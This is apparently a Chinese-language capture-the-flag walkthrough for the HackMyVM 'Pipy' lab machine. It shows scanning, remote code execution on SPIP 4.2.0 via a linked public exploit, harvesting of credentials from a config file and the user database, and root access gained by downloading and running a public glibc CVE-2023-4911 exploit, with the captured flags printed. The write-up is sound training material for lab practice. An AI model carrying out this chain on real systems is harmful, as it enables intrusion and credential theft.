HackMyVM Pipy
信息收集
root@kali:~# nmap 192.168.100.54 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-19 01:57 EDT
Nmap scan report for dev.loooower (192.168.100.54)
Host is up (0.00076s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:99:73:FC (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 5.79 seconds
root@kali:~# nmap 192.168.100.54 -p80 -sC -sV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-19 02:40 EDT
Nmap scan report for dev.loooower (192.168.100.54)
Host is up (0.00059s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-generator: SPIP 4.2.0
|_http-title: Mi sitio SPIP
MAC Address: 08:00:27:99:73:FC (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.66 seconds发现 SPIP 版本为 4.2.0 https://www.exploit-db.com/exploits/51536
有 RCE 直接使用 poc 弹 Shell 我用了这个https://github.com/0SPwn/CVE-2023-27372-PoC/blob/main/exploit.py
提权 angela
www-data@pipy:/var/www$ ls -al
total 20
drwxr-xr-x 4 www-data www-data 4096 Oct 5 2023 .
drwxr-xr-x 14 root root 4096 Oct 2 2023 ..
-rw------- 1 www-data www-data 130 Oct 5 2023 .bash_history
drwxrwxrwx 3 www-data www-data 4096 Oct 5 2023 .local
drwxr-xr-x 11 www-data www-data 4096 Oct 4 2023 html
www-data@pipy:/var/www$ cat .bash_history
whoami
exit
exit
reset xterm
export TERM=xterm-256color
stty rows 51 cols 197
ls
nano
ls
cat config/connect.php
mysql -u root -p
www-data@pipy:/var/www/html$ cat config/connect.php
<?php
if (!defined("_ECRIRE_INC_VERSION")) return;
defined('_MYSQL_SET_SQL_MODE') || define('_MYSQL_SET_SQL_MODE',true);
$GLOBALS['spip_connect_version'] = 0.8;
spip_connect_db('localhost','','root','dbpassword','spip','mysql', 'spip','','');连接 mysql 密码dbpassword:
MariaDB [spip]> show tables
-> ;
+-------------------------+
| Tables_in_spip |
+-------------------------+
| spip_articles |
| spip_auteurs |
| spip_auteurs_liens |
| spip_depots |
| spip_depots_plugins |
| spip_documents |
| spip_documents_liens |
| spip_forum |
| spip_groupes_mots |
| spip_jobs |
| spip_jobs_liens |
| spip_meta |
| spip_mots |
| spip_mots_liens |
| spip_paquets |
| spip_plugins |
| spip_referers |
| spip_referers_articles |
| spip_resultats |
| spip_rubriques |
| spip_syndic |
| spip_syndic_articles |
| spip_types_documents |
| spip_urls |
| spip_versions |
| spip_versions_fragments |
| spip_visites |
| spip_visites_articles |
+-------------------------+
28 rows in set (0.000 sec)
MariaDB [spip]> select * from spip_auteurs;
+-----------+--------+-----+-----------------+----------+----------+--------+--------------------------------------------------------------+---------+-----------+-----------+---------------------+-----+--------+---------------------+-----------------------------------+----------------------------------+---------------------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------+--------+------+----------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id_auteur | nom | bio | email | nom_site | url_site | login | pass | low_sec | statut | webmestre | maj | pgp | htpass | en_ligne | alea_actuel | alea_futur | prefs | cookie_oubli | source | lang | imessage | backup_cles |
+-----------+--------+-----+-----------------+----------+----------+--------+--------------------------------------------------------------+---------+-----------+-----------+---------------------+-----+--------+---------------------+-----------------------------------+----------------------------------+---------------------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------+--------+------+----------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 1 | Angela | | [email protected] | | | angela | 4ng3l4 | | 0minirezo | oui | 2023-10-04 17:28:39 | | | 2023-10-04 13:50:34 | 387046876651c39a45bc836.13502903 | 465278670651d6da4349d85.01841245 | a:4:{s:7:"couleur";i:2;s:7:"display";i:2;s:18:"display_navigation";s:22:"navigation_avec_icones";s:3:"cnx";s:0:"";} | NULL | spip | | | 3HnqCYcjg+hKOjCODrOTwhvDGXqQ34zRxFmdchyPL7wVRW3zsPwE6+4q0GlAPo4b4OGRmzvR6NNFdEjARDtoeIAxH88cQZt2H3ENUggrz99vFfCmWHIdJgSDSOI3A3nmnfEg43BDP4q9co/AP0XIlGzGteMiSJwc0fCXOCxzCW9NwvzJYM/u/8cWGGdRALd7fzFYhOY6DmokVnIlwauc8/lwRyNbam1H6+g5ju57cI8Dzll+pCMUPhhti9RvC3WNzC2IUcPnHEM= |
| 2 | admin | | [email protected] | | | admin | $2y$10$.GR/i2bwnVInUmzdzSi10u66AKUUWGGDBNnA7IuIeZBZVtFMqTsZ2 | | 1comite | non | 2023-10-04 17:31:03 | | | 2023-10-04 17:31:03 | 1540227024651d7e881c21a5.84797952 | 439334464651da1526dbb90.67439545 | a:4:{s:7:"couleur";i:2;s:7:"display";i:2;s:18:"display_navigation";s:22:"navigation_avec_icones";s:3:"cnx";s:0:"";} | 1118839.6HqFdtVwUs3T6+AJRJOdnZG6GFPNzl4/wAh9i0D1bqfjYKMJSG63z4KPzonGgNUHz+NmYNLbcIM83Tilz5NYrlGKbw4/cDDBE1mXohDXwEDagYuW2kAUYeqd8y5XqDogNsLGEJIzn0o= | spip | fr | oui | |
+-----------+--------+-----+-----------------+----------+----------+--------+--------------------------------------------------------------+---------+-----------+-----------+---------------------+-----+--------+---------------------+-----------------------------------+----------------------------------+---------------------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------+--------+------+----------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
2 rows in set (0.000 sec)
MariaDB [spip]>密码明文保存: 4ng3l4
UserFlag
angela@pipy:~$ cat user.txt
dab37650d43787424362d5805140538d提权 Root
angela@pipy:~$ ss -tuln
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 192.168.100.54%enp0s3:68 0.0.0.0:*
tcp LISTEN 0 1024 127.0.0.1:4226 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 511 *:80 *:*
tcp LISTEN 0 128 [::]:22 [::]:*
angela@pipy:~$ nc 127.0.0.1 4226
root
id
angela@pipy:~$ nc 127.0.0.1 4226
id
id
id不知道是什么东西 找了很久也没有找到什么有用的
那尝试一下内核漏洞,找了半天都不行最后看了一下 wp CVE-2023-4911
angela@pipy:~$ wget https://github.com/leesh3288/CVE-2023-4911/archive/refs/heads/main.zip
...
angela@pipy:~$ unzip main.zip
Archive: main.zip
acf0d3a8bd4c437475a7c4c83f5790e53e8103cb
creating: CVE-2023-4911-main/
inflating: CVE-2023-4911-main/Makefile
inflating: CVE-2023-4911-main/README.md
inflating: CVE-2023-4911-main/exp.c
inflating: CVE-2023-4911-main/gen_libc.py
angela@pipy:~/CVE-2023-4911-main$ make
gcc -o exp exp.c
python3 gen_libc.py
[*] '/lib/x86_64-linux-gnu/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
./exp
# id
uid=0(root) gid=0(root) groups=0(root),1000(angela)RootFlag
# cat root.txt
ab55ed08716cd894e8097a87dafed016